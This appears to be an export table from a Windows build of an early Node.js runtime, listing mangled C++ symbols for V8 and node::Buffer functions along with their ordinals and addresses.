?AsciiSlice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	145	0x140013cd0
?AsciiWrite@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	146	0x140014860
?AtExit@node@@YAXP6AXPEAX@Z0@Z	147	0x140012b20
?Base64Slice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	148	0x140013d50
?Base64Write@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	149	0x1400147c0
?BinarySlice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	150	0x140013cb0
?BinaryWrite@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	151	0x1400147e0
?BooleanValue@BooleanObject@v8@@QEBA_NXZ	152	0x140176910
?BooleanValue@Value@v8@@QEBA_NXZ	153	0x140169f90
?ByteLength@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	154	0x140014980
?Call@Debug@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VFunction@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	155	0x14017adf0
?Call@Function@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VObject@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z	156	0x1401712c0
?CallAsConstructor@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z	157	0x140170a60
?CallAsFunction@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VObject@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z	158	0x140170650
?CanContinue@TryCatch@v8@@QEBA_NXZ	159	0x140164b70
?CanMakeExternal@String@v8@@QEAA_NXZ	160	0x1401763e0
?CancelDebugBreak@Debug@v8@@SAXPEAVIsolate@2@@Z	161	0x14017a960
?CheckCast@Array@v8@@CAXPEAVValue@2@@Z	162	0x1401698b0
?CheckCast@BooleanObject@v8@@CAXPEAVValue@2@@Z	163	0x140169d60
?CheckCast@Date@v8@@CAXPEAVValue@2@@Z	164	0x1401699a0
?CheckCast@External@v8@@CAXPEAVValue@2@@Z	165	0x1401692f0
?CheckCast@Function@v8@@CAXPEAVValue@2@@Z	166	0x1401694d0
?CheckCast@Integer@v8@@CAXPEAVValue@2@@Z	167	0x1401697b0
?CheckCast@Number@v8@@CAXPEAVValue@2@@Z	168	0x1401696b0
?CheckCast@NumberObject@v8@@CAXPEAVValue@2@@Z	169	0x140169c20
?CheckCast@Object@v8@@CAXPEAVValue@2@@Z	170	0x1401693e0
?CheckCast@RegExp@v8@@CAXPEAVValue@2@@Z	171	0x140169ea0
?CheckCast@String@v8@@CAXPEAVValue@2@@Z	172	0x1401695c0
?CheckCast@StringObject@v8@@CAXPEAVValue@2@@Z	173	0x140169ae0
?CheckedGetInternalField@Object@v8@@AEAA?AV?$Local@VValue@v8@@@2@H@Z	174	0x140173530
?Clear@?$Handle@VFunctionTemplate@v8@@@v8@@QEAAXXZ	175	0x140002bc0
?Clear@?$Handle@VObject@v8@@@v8@@QEAAXXZ	176	0x140002bc0
?ClearWeak@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXXZ	177	0x140002cf0
?ClearWeak@?$Persistent@VObject@v8@@@v8@@QEAAXXZ	178	0x140002cf0
?ClearWeak@V8@v8@@CAXPEAPEAVObject@internal@2@@Z	179	0x14015f910
?Clone@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ	180	0x14016ec20
?CloneElementAt@Array@v8@@QEAA?AV?$Local@VObject@v8@@@2@I@Z	181	0x140177800
?Compile@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@PEAVScriptOrigin@2@PEAVScriptData@2@0@Z	182	0x140163de0
?Compile@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@0@Z	183	0x140164020
?Concat@String@v8@@SA?AV?$Local@VString@v8@@@2@V?$Handle@VString@v8@@@2@0@Z	184	0x140175950
?ContextDisposedNotification@V8@v8@@SAHXZ	185	0x140173e30
?Copy@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	186	0x1400142e0
?CreateHandle@HandleScope@v8@@SAPEAPEAVObject@internal@2@PEAV342@@Z	187	0x14015fe60
?CreateHandle@HandleScope@v8@@SAPEAPEAVObject@internal@2@PEAVHeapObject@42@@Z	188	0x14015feb0
?CreationContext@Object@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ	189	0x14016ee70
?CurrentStackTrace@StackTrace@v8@@SA?AV?$Local@VStackTrace@v8@@@2@HW4StackTraceOptions@12@@Z	190	0x140166990
?Data@AccessorInfo@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ	191	0x140001970
?Data@Buffer@node@@SAPEADPEAV12@@Z	192	0x140009730
?Data@Buffer@node@@SAPEADV?$Handle@VValue@v8@@@v8@@@Z	193	0x1400096f0
?DateTimeConfigurationChangeNotification@Date@v8@@SAXXZ	194	0x140176e90
?DebugBreak@Debug@v8@@SAXPEAVIsolate@2@@Z	195	0x14017a930
?DebugBreakForCommand@Debug@v8@@SAXPEAVClientData@12@PEAVIsolate@2@@Z	196	0x14017a990
?DecodeBytes@node@@YA_JV?$Handle@VValue@v8@@@v8@@W4encoding@1@@Z	197	0x14000c360
?DecodeWrite@node@@YA_JPEAD_KV?$Handle@VValue@v8@@@v8@@W4encoding@1@@Z	198	0x14000c460
?Decompress@StartupDataDecompressor@v8@@QEAAHXZ	199	0x14015f1f0
?DefineWrapperClass@HeapProfiler@v8@@SAXGP6APEAVRetainedObjectInfo@2@GV?$Handle@VValue@v8@@@2@@Z@Z	200	0x14017d490
?Delete@CpuProfile@v8@@QEAAXXZ	201	0x14017b9f0
?Delete@HeapSnapshot@v8@@QEAAXXZ	202	0x14017c860
?Delete@Object@v8@@QEAA_NI@Z	203	0x14016d920
?Delete@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z	204	0x14016d5c0
?DeleteAllProfiles@CpuProfiler@v8@@SAXXZ	205	0x14017c120
?DeleteAllSnapshots@HeapProfiler@v8@@SAXXZ	206	0x14017d420
?DeleteHiddenValue@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z	207	0x14016f580
?DeoptimizeAll@Testing@v8@@SAXXZ	208	0x14017d600
?DetachGlobal@Context@v8@@QEAAXXZ	209	0x1401749a0
?DisableAgent@Debug@v8@@SAXXZ	210	0x14017b240
?Dispose@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXXZ	211	0x140002c00
?Dispose@?$Persistent@VObject@v8@@@v8@@QEAAXXZ	212	0x140002c00
?Dispose@ExternalStringResourceBase@String@v8@@MEAAXXZ	213	0x1400010f0
?Dispose@Isolate@v8@@QEAAXXZ	214	0x1401792d0
?Dispose@V8@v8@@SA_NXZ	215	0x140173a80
?DisposeGlobal@V8@v8@@CAXPEAPEAVObject@internal@2@@Z	216	0x14015fbc0
?Empty@String@v8@@SA?AV?$Local@VString@v8@@@2@XZ	217	0x140175790
?EnableAgent@Debug@v8@@SA_NPEBDH_N@Z	218	0x14017b1d0
?EnableSlidingStateWindow@V8@v8@@SAXXZ	219	0x140178620
?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEBX_KW4encoding@1@@Z	220	0x14000c340
?Enter@Context@v8@@QEAAXXZ	221	0x14015ff00
?Enter@Isolate@v8@@QEAAXXZ	222	0x140179340
?Equals@Value@v8@@QEBA_NV?$Handle@VValue@v8@@@2@@Z	223	0x14016ad50
?ErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@HPEBD00@Z	224	0x14000a350
?Error@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	225	0x14017a1f0
?Exception@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ	226	0x140164c10
?Exit@Context@v8@@QEAAXXZ	227	0x140160010
?Exit@Isolate@v8@@QEAAXXZ	228	0x140179360
?False@v8@@YA?AV?$Handle@VBoolean@v8@@@1@XZ	229	0x14015f630
?FatalException@node@@YAXAEAVTryCatch@v8@@@Z	230	0x14000ed50
?Fill@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	231	0x140013d70
?FindInstanceInPrototypeChain@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z	232	0x14016c8e0
?FindProfile@CpuProfiler@v8@@SAPEBVCpuProfile@2@IV?$Handle@VValue@v8@@@2@@Z	233	0x14017be70
?FindSnapshot@HeapProfiler@v8@@SAPEBVHeapSnapshot@2@I@Z	234	0x14017d020
?ForceDelete@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@@Z	235	0x14016bc90
?ForceSet@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@0W4PropertyAttribute@2@@Z	236	0x14016ba10
?FullIsNull@Value@v8@@AEBA_NXZ	237	0x140167630
?FullIsString@Value@v8@@AEBA_NXZ	238	0x140167950
?FullIsUndefined@Value@v8@@AEBA_NXZ	239	0x140167570
?FullUnwrap@External@v8@@CAPEAXV?$Handle@VValue@v8@@@2@@Z	240	0x140175520
?Get@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	241	0x140164f90
?Get@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@I@Z	242	0x14016c110
?Get@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	243	0x14016bf50
?GetBottomUpRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ	244	0x14017bc20
?GetCallUid@CpuProfileNode@v8@@QEBAIXZ	245	0x14017b880
?GetCalling@Context@v8@@SA?AV?$Local@VContext@v8@@@2@XZ	246	0x140174820
?GetChild@CpuProfileNode@v8@@QEBAPEBV12@H@Z	247	0x14017b970
?GetChild@HeapGraphNode@v8@@QEBAPEBVHeapGraphEdge@2@H@Z	248	0x14017c700
?GetChildrenCount@CpuProfileNode@v8@@QEBAHXZ	249	0x14017b900
?GetChildrenCount@HeapGraphNode@v8@@QEBAHXZ	250	0x14017c690
?GetChunkSize@OutputStream@v8@@UEAAHXZ	251	0x140001710
?GetColumn@StackFrame@v8@@QEBAHXZ	252	0x140166c00
?GetCompressedStartupData@V8@v8@@SAXPEAVStartupData@2@@Z	253	0x140368010
?GetCompressedStartupDataAlgorithm@V8@v8@@SA?AW4CompressionAlgorithm@StartupData@2@XZ	254	0x14028a7c0
?GetCompressedStartupDataCount@V8@v8@@SAHXZ	255	0x14028a7c0
?GetConstructor@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ	256	0x14016d2a0
?GetConstructorName@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ	257	0x14016d430
?GetCurrent@Context@v8@@SA?AV?$Local@VContext@v8@@@2@XZ	258	0x140174740
?GetCurrent@Isolate@v8@@SAPEAV12@XZ	259	0x140179290
?GetCurrentThreadId@V8@v8@@SAHXZ	260	0x1401790b0
?GetData@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ	261	0x140160220
?GetData@Isolate@v8@@QEAAPEAXXZ	262	0x140001400
?GetDebugContext@Debug@v8@@SA?AV?$Local@VContext@v8@@@2@XZ	263	0x14017b280
?GetElementCount@RetainedObjectInfo@v8@@UEAA_JXZ	264	0x1400132b0
?GetEndColumn@Message@v8@@QEBAHXZ	265	0x140166000
?GetEndPosition@Message@v8@@QEBAHXZ	266	0x140165c40
?GetEntered@Context@v8@@SA?AV?$Local@VContext@v8@@@2@XZ	267	0x1401746c0
?GetExternalAsciiStringResource@String@v8@@QEBAPEBVExternalAsciiStringResource@12@XZ	268	0x140172f70
?GetFlags@RegExp@v8@@QEBA?AW4Flags@12@XZ	269	0x140177590
?GetFrame@StackTrace@v8@@QEBA?AV?$Local@VStackFrame@v8@@@2@I@Z	270	0x140166620
?GetFrameCount@StackTrace@v8@@QEBAHXZ	271	0x1401667d0
?GetFromNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ	272	0x14017c370
?GetFunction@FunctionTemplate@v8@@QEAA?AV?$Local@VFunction@v8@@@2@XZ	273	0x140175060
?GetFunctionName@CpuProfileNode@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ	274	0x14017b3d0
?GetFunctionName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	275	0x1401670d0
?GetGroupLabel@RetainedObjectInfo@v8@@UEAAPEBDXZ	276	0x1400132a0
?GetHeapStatistics@V8@v8@@SAXPEAVHeapStatistics@2@@Z	277	0x140173b20
?GetHeapValue@HeapGraphNode@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	278	0x14017c790
?GetHiddenValue@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	279	0x14016f390
?GetId@HeapGraphNode@v8@@QEBAIXZ	280	0x14017c5b0
?GetIdentityHash@Object@v8@@QEAAHXZ	281	0x14016f000
?GetIndexedPropertiesExternalArrayData@Object@v8@@QEAAPEAXXZ	282	0x140170110
?GetIndexedPropertiesExternalArrayDataLength@Object@v8@@QEAAHXZ	283	0x140170370
?GetIndexedPropertiesExternalArrayDataType@Object@v8@@QEAA?AW4ExternalArrayType@2@XZ	284	0x140170200
?GetIndexedPropertiesPixelData@Object@v8@@QEAAPEAEXZ	285	0x14016fc20
?GetIndexedPropertiesPixelDataLength@Object@v8@@QEAAHXZ	286	0x14016fd00
?GetInferredName@Function@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	287	0x1401717d0
?GetIsolate@AccessorInfo@v8@@QEBAPEAVIsolate@2@XZ	288	0x140001960
?GetLineNumber@CpuProfileNode@v8@@QEBAHXZ	289	0x14017b600
?GetLineNumber@Message@v8@@QEBAHXZ	290	0x140165860
?GetLineNumber@StackFrame@v8@@QEBAHXZ	291	0x140166a70
?GetMaxSnapshotJSObjectId@HeapSnapshot@v8@@QEBAIXZ	292	0x14017cce0
?GetMemorySizeUsedByProfiler@HeapProfiler@v8@@SA_KXZ	293	0x14017d520
?GetMirror@Debug@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	294	0x14017afa0
?GetName@Function@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	295	0x140171740
?GetName@HeapGraphEdge@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	296	0x14017c200
?GetName@HeapGraphNode@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ	297	0x14017c4e0
?GetNativeFunction@Extension@v8@@UEAA?AV?$Handle@VFunctionTemplate@v8@@@2@V?$Handle@VString@v8@@@2@@Z	298	0x140001290
?GetNode@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@H@Z	299	0x14017cc50
?GetNodeById@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@I@Z	300	0x14017cb30
?GetNodesCount@HeapSnapshot@v8@@QEBAHXZ	301	0x14017cbe0
?GetOutputEncoding@OutputStream@v8@@UEAA?AW4OutputEncoding@12@XZ	302	0x14028a7c0
?GetOwnPropertyNames@Object@v8@@QEAA?AV?$Local@VArray@v8@@@2@XZ	303	0x14016cd60
?GetPersistentHandleCount@HeapProfiler@v8@@SAHXZ	304	0x14017d500
?GetProfile@CpuProfiler@v8@@SAPEBVCpuProfile@2@HV?$Handle@VValue@v8@@@2@@Z	305	0x14017bda0
?GetProfilesCount@CpuProfiler@v8@@SAHXZ	306	0x14017bd10
?GetPropertyAttributes@Object@v8@@QEAA?AW4PropertyAttribute@2@V?$Handle@VValue@v8@@@2@@Z	307	0x14016c2c0
?GetPropertyNames@Object@v8@@QEAA?AV?$Local@VArray@v8@@@2@XZ	308	0x14016caf0
?GetPrototype@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ	309	0x14016c530
?GetRealNamedProperty@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	310	0x14016e740
?GetRealNamedPropertyInPrototypeChain@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	311	0x14016e570
?GetRoot@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@XZ	312	0x14017cab0
?GetScriptColumnNumber@Function@v8@@QEBAHXZ	313	0x140171aa0
?GetScriptData@Message@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	314	0x140165320
?GetScriptId@Function@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	315	0x140171be0
?GetScriptLineNumber@Function@v8@@QEBAHXZ	316	0x1401719e0
?GetScriptName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	317	0x140166d90
?GetScriptNameOrSourceURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	318	0x140166f30
?GetScriptOrigin@Function@v8@@QEBA?AVScriptOrigin@2@XZ	319	0x140171860
?GetScriptResourceName@CpuProfileNode@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ	320	0x14017b530
?GetScriptResourceName@Message@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ	321	0x140165140
?GetSecurityToken@Context@v8@@QEAA?AV?$Handle@VValue@v8@@@2@XZ	322	0x140174520
?GetSelfSamplesCount@CpuProfileNode@v8@@QEBANXZ	323	0x14017b800
?GetSelfSize@HeapGraphNode@v8@@QEBAHXZ	324	0x14017c620
?GetSelfTime@CpuProfileNode@v8@@QEBANXZ	325	0x14017b700
?GetSizeInBytes@RetainedObjectInfo@v8@@UEAA_JXZ	326	0x1400132b0
?GetSnapshot@HeapProfiler@v8@@SAPEBVHeapSnapshot@2@H@Z	327	0x14017cf90
?GetSnapshotObjectId@HeapProfiler@v8@@SAIV?$Handle@VValue@v8@@@2@@Z	328	0x14017d0c0
?GetSnapshotsCount@HeapProfiler@v8@@SAHXZ	329	0x14017cf10
?GetSource@RegExp@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	330	0x140177490
?GetSourceLine@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	331	0x1401662b0
?GetStackTrace@Message@v8@@QEBA?AV?$Handle@VStackTrace@v8@@@2@XZ	332	0x140165500
?GetStartColumn@Message@v8@@QEBAHXZ	333	0x140165d80
?GetStartPosition@Message@v8@@QEBAHXZ	334	0x140165b00
?GetStressRuns@Testing@v8@@SAHXZ	335	0x14017d560
?GetTitle@CpuProfile@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ	336	0x14017bb50
?GetTitle@HeapSnapshot@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ	337	0x14017c9e0
?GetToNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ	338	0x14017c400
?GetTopDownRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ	339	0x14017bca0
?GetTotalSamplesCount@CpuProfileNode@v8@@QEBANXZ	340	0x14017b780
?GetTotalTime@CpuProfileNode@v8@@QEBANXZ	341	0x14017b680
?GetType@HeapGraphEdge@v8@@QEBA?AW4Type@12@XZ	342	0x14017c190
?GetType@HeapGraphNode@v8@@QEBA?AW4Type@12@XZ	343	0x14017c470
?GetType@HeapSnapshot@v8@@QEBA?AW4Type@12@XZ	344	0x14017c900
?GetUid@CpuProfile@v8@@QEBAIXZ	345	0x14017bae0
?GetUid@HeapSnapshot@v8@@QEBAIXZ	346	0x14017c970
?GetVersion@V8@v8@@SAPEBDXZ	347	0x140173e70
?GetWrapperClassId@V8@v8@@CAGPEAPEAVObject@internal@2@@Z	348	0x140174e80
?Global@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ	349	0x1401748c0
?GlobalizeReference@V8@v8@@CAPEAPEAVObject@internal@2@PEAPEAV342@@Z	350	0x14015f760
?Has@Object@v8@@QEAA_NI@Z	351	0x14016dad0
?Has@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z	352	0x14016d790
?HasCaught@TryCatch@v8@@QEBA_NXZ	353	0x140164b40
?HasIndexedLookupInterceptor@Object@v8@@QEAA_NXZ	354	0x14016e3b0
?HasIndexedPropertiesInExternalArrayData@Object@v8@@QEAA_NXZ	355	0x140170020
?HasIndexedPropertiesInPixelData@Object@v8@@QEAA_NXZ	356	0x14016fb40
?HasInstance@Buffer@node@@SA_NV?$Handle@VValue@v8@@@v8@@@Z	357	0x140014e10
?HasInstance@FunctionTemplate@v8@@QEAA_NV?$Handle@VValue@v8@@@2@@Z	358	0x140175230
?HasNamedLookupInterceptor@Object@v8@@QEAA_NXZ	359	0x14016e2e0
?HasOutOfMemoryException@Context@v8@@QEAA_NXZ	360	0x140174620
?HasOwnProperty@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z	361	0x14016de40
?HasRealIndexedProperty@Object@v8@@QEAA_NI@Z	362	0x14016e090
?HasRealNamedCallbackProperty@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z	363	0x14016e180
?HasRealNamedProperty@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z	364	0x14016df80
?HexSlice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	365	0x140013d30
?HexWrite@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	366	0x140014840
?Holder@AccessorInfo@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ	367	0x140001990
?Id@Script@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ	368	0x140164600
?IdleNotification@V8@v8@@SA_NH@Z	369	0x140173db0
?IgnoreOutOfMemoryException@V8@v8@@SAXXZ	370	0x140177e30
?InContext@Context@v8@@SA_NXZ	371	0x140174690
?Inherit@FunctionTemplate@v8@@QEAAXV?$Handle@VFunctionTemplate@v8@@@2@@Z	372	0x140160bf0
?Initialize@Buffer@node@@SAXV?$Handle@VObject@v8@@@v8@@@Z	373	0x140015160
?Initialize@Data@HandleScope@v8@@QEAAXXZ	374	0x140001000
?Initialize@V8@v8@@SA_NXZ	375	0x1401739b0
?InstanceTemplate@FunctionTemplate@v8@@QEAA?AV?$Local@VObjectTemplate@v8@@@2@XZ	376	0x1401619e0
?Int32Value@Value@v8@@QEBAHXZ	377	0x14016ab30
?IntegerValue@Value@v8@@QEBA_JXZ	378	0x14016a340
?InternalFieldCount@Object@v8@@QEAAHXZ	379	0x140173450
?InternalFieldCount@ObjectTemplate@v8@@QEAAHXZ	380	0x1401634e0
?IsActive@Locker@v8@@SA_NXZ	381	0x14015ce30
?IsArray@Value@v8@@QEBA_NXZ	382	0x140167a00
?IsBoolean@Value@v8@@QEBA_NXZ	383	0x140167c50
?IsBooleanObject@Value@v8@@QEBA_NXZ	384	0x140168680
?IsCallable@Object@v8@@QEAA_NXZ	385	0x140170470
?IsCodeGenerationFromStringsAllowed@Context@v8@@QEAA_NXZ	386	0x140174c70
?IsConstructor@StackFrame@v8@@QEBA_NXZ	387	0x1401673f0
?IsDate@Value@v8@@QEBA_NXZ	388	0x140168090
?IsDead@V8@v8@@SA_NXZ	389	0x14015f020
?IsDirty@Object@v8@@QEAA_NXZ	390	0x14016ebe0
?IsEmpty@?$Handle@VFunctionTemplate@v8@@@v8@@QEBA_NXZ	391	0x140002be0
?IsEmpty@?$Handle@VObject@v8@@@v8@@QEBA_NXZ	392	0x140002be0
?IsEval@StackFrame@v8@@QEBA_NXZ	393	0x140167270
?IsExecutionTerminating@V8@v8@@SA_NPEAVIsolate@2@@Z	394	0x140179250
?IsExternal@String@v8@@QEBA_NXZ	395	0x140172c60
?IsExternal@Value@v8@@QEBA_NXZ	396	0x140167d20
?IsExternalAscii@String@v8@@QEBA_NXZ	397	0x140172d20
?IsFalse@Value@v8@@QEBA_NXZ	398	0x1401677c0
?IsFunction@Value@v8@@QEBA_NXZ	399	0x140167890
?IsGlobalIndependent@V8@v8@@CA_NPEAPEAVObject@internal@2@@Z	400	0x14015fa20
?IsGlobalNearDeath@V8@v8@@CA_NPEAPEAVObject@internal@2@@Z	401	0x14015faa0
?IsGlobalWeak@V8@v8@@CA_NPEAPEAVObject@internal@2@@Z	402	0x14015fb40
?IsIndependent@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBA_NXZ	403	0x140002d00
?IsIndependent@?$Persistent@VObject@v8@@@v8@@QEBA_NXZ	404	0x140002d00
?IsInt32@Value@v8@@QEBA_NXZ	405	0x140167de0
?IsLocked@Locker@v8@@SA_NPEAVIsolate@2@@Z	406	0x14015cdc0
?IsNativeError@Value@v8@@QEBA_NXZ	407	0x140168480
?IsNearDeath@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBA_NXZ	408	0x140002c80
?IsNearDeath@?$Persistent@VObject@v8@@@v8@@QEBA_NXZ	409	0x140002c80
?IsNumber@Value@v8@@QEBA_NXZ	410	0x140167b80
?IsNumberObject@Value@v8@@QEBA_NXZ	411	0x1401682b0
?IsObject@Value@v8@@QEBA_NXZ	412	0x140167ac0
?IsProfilerPaused@V8@v8@@SA_NXZ	413	0x140179070
?IsRegExp@Value@v8@@QEBA_NXZ	414	0x140168790
?IsStringObject@Value@v8@@QEBA_NXZ	415	0x1401681a0
?IsTrue@Value@v8@@QEBA_NXZ	416	0x1401676f0
?IsUint32@Value@v8@@QEBA_NXZ	417	0x140167f20
?IsWeak@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBA_NXZ	418	0x140002c90
?IsWeak@?$Persistent@VObject@v8@@@v8@@QEBA_NXZ	419	0x140002c90
?IsWithinBounds@Buffer@node@@SA_N_K00@Z	420	0x1400097f0
?Leave@HandleScope@v8@@AEAAXXZ	421	0x14015fd90
?Length@Array@v8@@QEBAIXZ	422	0x140177740
?Length@Buffer@node@@SA_KPEAV12@@Z	423	0x1400097b0
?Length@Buffer@node@@SA_KV?$Handle@VValue@v8@@@v8@@@Z	424	0x140009770
?Length@String@v8@@QEBAHXZ	425	0x140171ce0
?LowMemoryNotification@V8@v8@@SAXXZ	426	0x140173e00
?MakeCallback@node@@YA?AV?$Handle@VValue@v8@@@v8@@V?$Handle@VObject@v8@@@3@PEBDHQEAV23@@Z	427	0x14000bb80
?MakeCallback@node@@YA?AV?$Handle@VValue@v8@@@v8@@V?$Handle@VObject@v8@@@3@V?$Handle@VFunction@v8@@@3@HQEAV23@@Z	428	0x14000b7f0
?MakeCallback@node@@YA?AV?$Handle@VValue@v8@@@v8@@V?$Handle@VObject@v8@@@3@V?$Handle@VString@v8@@@3@HQEAV23@@Z	429	0x14000bab0
?MakeExternal@String@v8@@QEAA_NPEAVExternalAsciiStringResource@12@@Z	430	0x140176200
?MakeExternal@String@v8@@QEAA_NPEAVExternalStringResource@12@@Z	431	0x140175f00
?MakeFastBuffer@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	432	0x140014b40
?MakeWeak@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXPEAXP6AXV?$Persistent@VValue@v8@@@2@0@Z@Z	433	0x140002ce0
?MakeWeak@?$Persistent@VObject@v8@@@v8@@QEAAXPEAXP6AXV?$Persistent@VValue@v8@@@2@0@Z@Z	434	0x140002ce0
?MakeWeak@ObjectWrap@node@@IEAAXXZ	435	0x140001af0
?MakeWeak@V8@v8@@CAXPEAPEAVObject@internal@2@PEAXP6AXV?$Persistent@VValue@v8@@@2@1@Z@Z	436	0x14015f840
?MarkAsUndetectable@ObjectTemplate@v8@@QEAAXXZ	437	0x140162d20
?MarkIndependent@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXXZ	438	0x140002c20
?MarkIndependent@?$Persistent@VObject@v8@@@v8@@QEAAXXZ	439	0x140002c20
?MarkIndependent@V8@v8@@CAXPEAPEAVObject@internal@2@@Z	440	0x14015f9c0
?MayContainNonAscii@String@v8@@QEBA_NXZ	441	0x1401720c0
?Message@TryCatch@v8@@QEBA?AV?$Local@VMessage@v8@@@2@XZ	442	0x140164ec0
?New@?$Persistent@VFunctionTemplate@v8@@@v8@@SA?AV12@V?$Handle@VFunctionTemplate@v8@@@2@@Z	443	0x140002cb0
?New@?$Persistent@VObject@v8@@@v8@@SA?AV12@V?$Handle@VObject@v8@@@2@@Z	444	0x140002cb0
?New@AccessorSignature@v8@@SA?AV?$Local@VAccessorSignature@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z	445	0x140161040
?New@Array@v8@@SA?AV?$Local@VArray@v8@@@2@H@Z	446	0x140177640
?New@BooleanObject@v8@@SA?AV?$Local@VValue@v8@@@2@_N@Z	447	0x1401767f0
?New@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	448	0x140013850
?New@Buffer@node@@SA?AV?$Handle@VObject@v8@@@v8@@V?$Handle@VString@v8@@@4@@Z	449	0x140013360
?New@Buffer@node@@SAPEAV12@PEAD_KP6AX0PEAX@Z2@Z	450	0x140013730
?New@Buffer@node@@SAPEAV12@PEBD_K@Z	451	0x140013620
?New@Buffer@node@@SAPEAV12@_K@Z	452	0x140013480
?New@Context@v8@@SA?AV?$Persistent@VContext@v8@@@2@PEAVExtensionConfiguration@2@V?$Handle@VObjectTemplate@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	453	0x140173f80
?New@Date@v8@@SA?AV?$Local@VValue@v8@@@2@N@Z	454	0x140176c40
?New@External@v8@@SA?AV?$Local@VExternal@v8@@@2@PEAX@Z	455	0x140175600
